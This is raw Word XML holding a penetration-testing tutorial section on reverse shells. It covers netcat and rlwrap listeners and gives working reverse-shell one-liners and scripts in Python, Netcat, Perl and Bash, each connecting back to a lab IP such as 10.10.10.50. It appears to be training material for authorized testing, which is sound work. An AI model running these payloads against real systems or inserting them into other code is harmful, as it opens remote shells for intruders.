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925415039062" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>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3.1 Reverse Shell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13493347168" w:lineRule="auto"/>
        <w:ind w:left="6.9782257080078125" w:right="71.153564453125" w:firstLine="10.805053710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Reverse shells are another staple of penetration testing. Getting a shell is normally your second stop once you have finished enumerating. Essentially, a reverse shell allows you to access a command-line interface on the target machine. From there, you would deploy enumeration scripts and continue the search for privilege escalation opportunities.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0.1416015625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="7.09075927734375"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The listener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3.84765625" w:line="337.6420211791992" w:lineRule="auto"/>
        <w:ind w:left="8.779067993164062" w:right="100.04150390625" w:hanging="3.6016845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first thing you need to do when looking at reverse shells is to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="32373f"/>
          <w:sz w:val="22.51045799255371"/>
          <w:szCs w:val="22.51045799255371"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set up</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a listener. By far the most common (and what you will use the most) is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netcat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listener. This will be pre-installed on kali, but you can also find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static binaries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which are pre-compiled and can be copied around between machines. There are even Windows variants!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3.4613037109375" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="10.534896850585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Simple listener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6.3043212890625" w:line="319.87220764160156" w:lineRule="auto"/>
        <w:ind w:left="14.85687255859375" w:right="12.1337890625" w:firstLine="6.077880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want to listen on port 4444 for incoming connections, you would use the command below on your machine.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7.7020263671875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="124.4828796386718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nc -nlvp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4444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57.63793945312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Looking at the arguments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2.6171875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="133.0368804931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 disables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DNS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service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lookups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240" w:lineRule="auto"/>
        <w:ind w:left="133.0368804931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 makes nc listen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connections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33.0368804931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 enables verbose output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33.0368804931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 sets a port. Privileged ports need root.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57.63763427734375" w:line="319.8717784881592" w:lineRule="auto"/>
        <w:ind w:left="0.6752777099609375" w:right="75.078125" w:hanging="0.675277709960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After that, once a reverse shell is triggered on the target, you will catch the shell as shown below (don't worry if you don't know how to trigger it - we will get to that)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2.61260986328125"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526478" cy="10577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6478" cy="10577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48089599609375" w:line="459.8152828216553" w:lineRule="auto"/>
        <w:ind w:left="19.899215698242188" w:right="1425.5352783203125" w:hanging="14.721832275390625"/>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is not a very good shell, we will look up upgrading it shortly. That said, it's functional. </w:t>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Improved listener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37.6420211791992" w:lineRule="auto"/>
        <w:ind w:left="0.6752777099609375" w:right="246.42333984375" w:firstLine="4.502105712890625"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="32373f"/>
          <w:sz w:val="22.51045799255371"/>
          <w:szCs w:val="22.51045799255371"/>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is not to be confused with upgrading our shell, but there are simple ways to improve the shell so we have some quality of life improvements. For example, right now,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clear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won't work. We can use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rlwrap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that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control + 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clear the screen. This is as below. Be sure to replace the port (4444 below) with the port you want to listen on</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="32373f"/>
          <w:sz w:val="22.51045799255371"/>
          <w:szCs w:val="22.51045799255371"/>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37.6420211791992" w:lineRule="auto"/>
        <w:ind w:left="0.6752777099609375" w:right="246.42333984375" w:firstLine="4.502105712890625"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="32373f"/>
          <w:sz w:val="22.51045799255371"/>
          <w:szCs w:val="22.5104579925537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37.6420211791992" w:lineRule="auto"/>
        <w:ind w:left="0.6752777099609375" w:right="246.42333984375" w:firstLine="4.502105712890625"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="32373f"/>
          <w:sz w:val="22.51045799255371"/>
          <w:szCs w:val="22.51045799255371"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="32373f"/>
          <w:sz w:val="22.51045799255371"/>
          <w:szCs w:val="22.51045799255371"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If rlwrap is not installed run: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37.6420211791992" w:lineRule="auto"/>
        <w:ind w:left="0.6752777099609375" w:right="246.42333984375" w:firstLine="4.502105712890625"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="32373f"/>
          <w:sz w:val="22.51045799255371"/>
          <w:szCs w:val="22.51045799255371"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="32373f"/>
          <w:sz w:val="22.51045799255371"/>
          <w:szCs w:val="22.51045799255371"/>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37.6420211791992" w:lineRule="auto"/>
        <w:ind w:left="0.6752777099609375" w:right="246.42333984375" w:firstLine="4.502105712890625"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="383a42"/>
          <w:sz w:val="22.51045799255371"/>
          <w:szCs w:val="22.51045799255371"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="383a42"/>
          <w:sz w:val="22.51045799255371"/>
          <w:szCs w:val="22.51045799255371"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo apt update</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000016">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="337.6420211791992" w:lineRule="auto"/>
        <w:ind w:left="0.6752777099609375" w:right="246.42333984375" w:firstLine="4.502105712890625"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="383a42"/>
          <w:sz w:val="22.51045799255371"/>
          <w:szCs w:val="22.51045799255371"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="383a42"/>
          <w:sz w:val="22.51045799255371"/>
          <w:szCs w:val="22.51045799255371"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo apt install rlwrap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0.9912109375" w:line="337.6424217224121" w:lineRule="auto"/>
        <w:ind w:left="337.581787109375" w:right="595.8349609375" w:firstLine="10.35484313964843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Remember that not all ports work during a pentest, some machines have outbound restrictions. If you can't get a connection on a common exploit port like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try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53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(DNS), or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80 / 443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(Web traffic). So long as nothing else is running on it, Kali does not mind using it as the listen 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033935546875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="131.236038208007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rlwrap -r nc -nlvp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4444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57.63671875" w:line="346.52687072753906" w:lineRule="auto"/>
        <w:ind w:left="8.779067993164062" w:right="30.93505859375" w:hanging="3.6016845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command above will work the same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but once the shell is up, you can use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control + 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clear the screen.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57.63671875" w:line="346.52687072753906" w:lineRule="auto"/>
        <w:ind w:left="8.779067993164062" w:right="30.93505859375" w:hanging="3.6016845703125"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="32373f"/>
          <w:sz w:val="22.51045799255371"/>
          <w:szCs w:val="22.51045799255371"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="32373f"/>
          <w:sz w:val="22.51045799255371"/>
          <w:szCs w:val="22.51045799255371"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">https://github.com/hanslub42/rlwrap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0.120849609375" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0"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Alias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3.780517578125" w:line="333.2003402709961" w:lineRule="auto"/>
        <w:ind w:left="4.0518951416015625" w:right="148.28369140625" w:hanging="3.3766174316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will likely already know about aliases. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="32373f"/>
          <w:sz w:val="22.51045799255371"/>
          <w:szCs w:val="22.51045799255371"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you remember, we used an Alias to create pyweb for our python server.</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They are essentially handy shortcuts so that instead of typing out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rlwrap -r nc -nlvp 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you could just type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listen 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the same command is executed.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5.1165771484375" w:line="346.5288734436035" w:lineRule="auto"/>
        <w:ind w:left="4.0518951416015625" w:right="195.87646484375" w:firstLine="1.12548828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Take a look in your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.zshrc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file in your kali home folder. there will be a section for aliases. If you want to be able to use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listen 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instead of remembering a long command, go ahead and insert this line.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2.6983642578125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="112.55233764648438" w:right="0" w:firstLine="0"/>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alias listen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'/usr/bin/sudo rlwrap -r nc -nlvp'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57.637939453125" w:line="489.80512619018555" w:lineRule="auto"/>
        <w:ind w:left="0.6752777099609375" w:right="1531.0595703125" w:hanging="4.502105712890625"/>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can either logout / login or type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source ~/.zshrc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apply the changes. That is the basics of setting up a listener to catch reverse shells, time to generate some. </w:t>
      </w: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Python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3.3367919921875" w:line="319.87086296081543" w:lineRule="auto"/>
        <w:ind w:left="4.0518951416015625" w:right="482.5048828125" w:firstLine="13.2811737060546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Python is extremely powerful. You will use it a lot throughout a pen-testing career. One of the great things it can do is connect as a reverse shell, and this is very simple.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2.62847900390625" w:line="337.6425075531006" w:lineRule="auto"/>
        <w:ind w:left="5.1773834228515625" w:right="137.03369140625" w:hanging="1.80084228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command below is a one-liner (that is, it's a single line) that will spawn a reverse shell using Python. In this example, it is connecting to a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="1"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="32373f"/>
          <w:sz w:val="22.51045799255371"/>
          <w:szCs w:val="22.51045799255371"/>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127.0.0.1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(I'm using localhost in this example, but it could be 10.10.10.50 or any other IP address). It is connecting to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will use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shell on the target.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6.0258483886719" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="117.5046539306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python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 'import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7.47146606445312" w:line="319.8720073699951" w:lineRule="auto"/>
        <w:ind w:left="128.53477478027344" w:right="138.458251953125" w:firstLine="6.753158569335937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socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s. connect((</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"127.0.0.1"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4444</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));os.dup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os.dup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os.dup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);p=subprocess.call([</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"/bin/sh"</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46.52687072753906" w:lineRule="auto"/>
        <w:ind w:left="6.9782257080078125" w:right="303.4912109375" w:firstLine="13.95652770996093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 the image below, I have turned up </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="32373f"/>
          <w:sz w:val="22.51045799255371"/>
          <w:szCs w:val="22.51045799255371"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">a</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listener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and then used the python reverse shell:  .m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17724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6717" cy="17724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19.8702621459961" w:lineRule="auto"/>
        <w:ind w:left="6.9782257080078125" w:right="461.846923828125" w:firstLine="13.95652770996093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Instantly I'm connected. It's that simple. Perhaps try out changing the listen port, and modifying the script to connect back on the new port.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0.131835937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Expanding the one liner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6.3037109375"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There are times that you may want to use the Python reverse shell, but not be able to use a one liner.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2.572021484375" w:line="319.8713493347168" w:lineRule="auto"/>
        <w:ind w:left="334.2052459716797" w:right="819.984130859375" w:hanging="4.05189514160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 example would be, you have found a python script that runs as root, and you can modify the contents. You can't just drop the one liner </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="32373f"/>
          <w:sz w:val="22.51045799255371"/>
          <w:szCs w:val="22.51045799255371"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">in it,</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as it won't run.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7.6629638671875" w:line="586.4333152770996" w:lineRule="auto"/>
        <w:ind w:left="143.1665802001953" w:right="649.46533203125" w:hanging="122.23182678222656"/>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took the block below, and dropped it in a file called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shell.py</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it would run and connect back. </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#!/usr/bin/python -w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2.7056884765625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="133.2619476318359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socket,subprocess,os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7.471923828125"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=socket.socket(socket.AF_INET,socket.SOCK_STREAM)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.connect((</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"127.0.0.1"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4444</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7.471923828125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="128.5347747802734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8.5347747802734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646.4085960388184" w:lineRule="auto"/>
        <w:ind w:left="24.986572265625" w:right="2298.992919921875" w:firstLine="103.54820251464844"/>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.dup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(s.fileno(),</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);p=subprocess.call([</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"/bin/sh"</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Netcat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455078125" w:line="333.19902420043945" w:lineRule="auto"/>
        <w:ind w:left="4.0518951416015625" w:right="42.69775390625" w:firstLine="13.05603027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Netcat is also good for sending shells (as well as other things we can get into later). The blocks below are run on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target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will send a shell back to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attacker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Naturally, you need to have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nc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the target for these to work. It does not matter if it is already there, or if you can copy it over yourself.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0.12725830078125" w:line="346.52729988098145" w:lineRule="auto"/>
        <w:ind w:left="4.0518951416015625" w:right="219.912109375" w:firstLine="1.12548828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examples below will send a shell </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="1"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="32373f"/>
          <w:sz w:val="22.51045799255371"/>
          <w:szCs w:val="22.51045799255371"/>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10.10.10.50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port 444.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flag defines the file that is executed after connection. For example,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-e /bin/sh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execute the shell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after connection.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6997375488281" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="124.4828796386718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nc -e /bin/sh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10.10.10.50 4444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7.47390747070312" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="124.48287963867188"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nc -e /bin/bash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10.10.10.50 4444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546.4446830749512" w:lineRule="auto"/>
        <w:ind w:left="347.2612762451172" w:right="4757.61474609375" w:hanging="342.0838928222656"/>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first image shows the shell received on kali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Note that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echo $0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prints the current shell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213.954467773438"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second image shows a caught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bash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shell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533508300781"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-e defined a bash shell, we can see it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echo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043.6651611328125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="24.6489715576171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Perl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8.843994140625" w:line="319.87112045288086" w:lineRule="auto"/>
        <w:ind w:left="14.85687255859375" w:right="233.140869140625" w:firstLine="1.57577514648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Like Python, perl can also be used to spawn a reverse shell. The example below will connect back to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10.10.10.50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the attacking machine when run on the target.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7.7166748046875" w:line="319.87112045288086" w:lineRule="auto"/>
        <w:ind w:left="128.7598419189453" w:right="273.5205078125" w:hanging="11.25518798828125"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="50a14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perl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-MIO -e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=new IO::Socket::INET(PeerAddr,"10.10.10.50:4444");STDIN- &gt;fdopen(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,r);$~-&gt;fdopen(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,w);system</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$_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while&lt;&gt;;'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5.219116210937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Expanding the one liner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6.30828857421875" w:line="333.19902420043945" w:lineRule="auto"/>
        <w:ind w:left="6.9782257080078125" w:right="235.196533203125" w:firstLine="9.4544219970703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Like Python, we can expand this out so it could be run from within a script. For example, within a Perl script called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revPerl.pl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 the contents of below would connect back to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`10.10.10.50.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0.1956176757812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#!/usr/bin/perl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7.46902465820312" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="122.456970214843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IO::socket;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57.6399230957031" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="137.5389099121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=new IO::Socket::INET(PeerAddr,</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"10.10.10.50:4444"</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7.46902465820312" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="132.8117370605468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STDIN-&gt;fdopen(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7.46894836425781" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="137.5389099121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-&gt;fdopen(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$_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&lt;&gt;;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5.140380859375" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="24.6489715576171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Bash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8.8427734375" w:line="319.8702621459961" w:lineRule="auto"/>
        <w:ind w:left="7.6535797119140625" w:right="25.552978515625" w:firstLine="8.77906799316406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Bash isn't just a great shell, it can also be used to spawn reverse shells. This is also helpful if the target does not have applications like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nc, or perl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2.637939453125" w:line="346.5311908721924" w:lineRule="auto"/>
        <w:ind w:left="8.103790283203125" w:right="551.912841796875" w:hanging="2.9264068603515625"/>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command below, when run on the target, will spawn a reverse shell back to port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4444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the attack </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="32373f"/>
          <w:sz w:val="22.51045799255371"/>
          <w:szCs w:val="22.51045799255371"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">machine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at IP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10.10.10.52</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7.705078125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="117.50465393066406"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bash -i &gt;&amp; /dev/tcp/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10.10.10.52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4444 0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&gt;&amp;</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65.130615234375" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="12.1556854248046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Summary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8.84765625" w:line="319.870548248291" w:lineRule="auto"/>
        <w:ind w:left="6.9782257080078125" w:right="69.940185546875" w:hanging="6.302947998046875"/>
        <w:jc w:val="both"/>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color w:val="32373f"/>
          <w:sz w:val="22.51045799255371"/>
          <w:szCs w:val="22.51045799255371"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">W</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e have looked at several of the most common / helpful reverse shell types and how you can enhance basic netcat sessions. Upgrading shells to interactive TTYs (and why that is important) will be covered shortly.</w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:pgSz w:h="16820" w:w="11880" w:orient="portrait"/>
      <w:pgMar w:bottom="846.240234375" w:top="610.008544921875" w:left="805.1045227050781" w:right="784.3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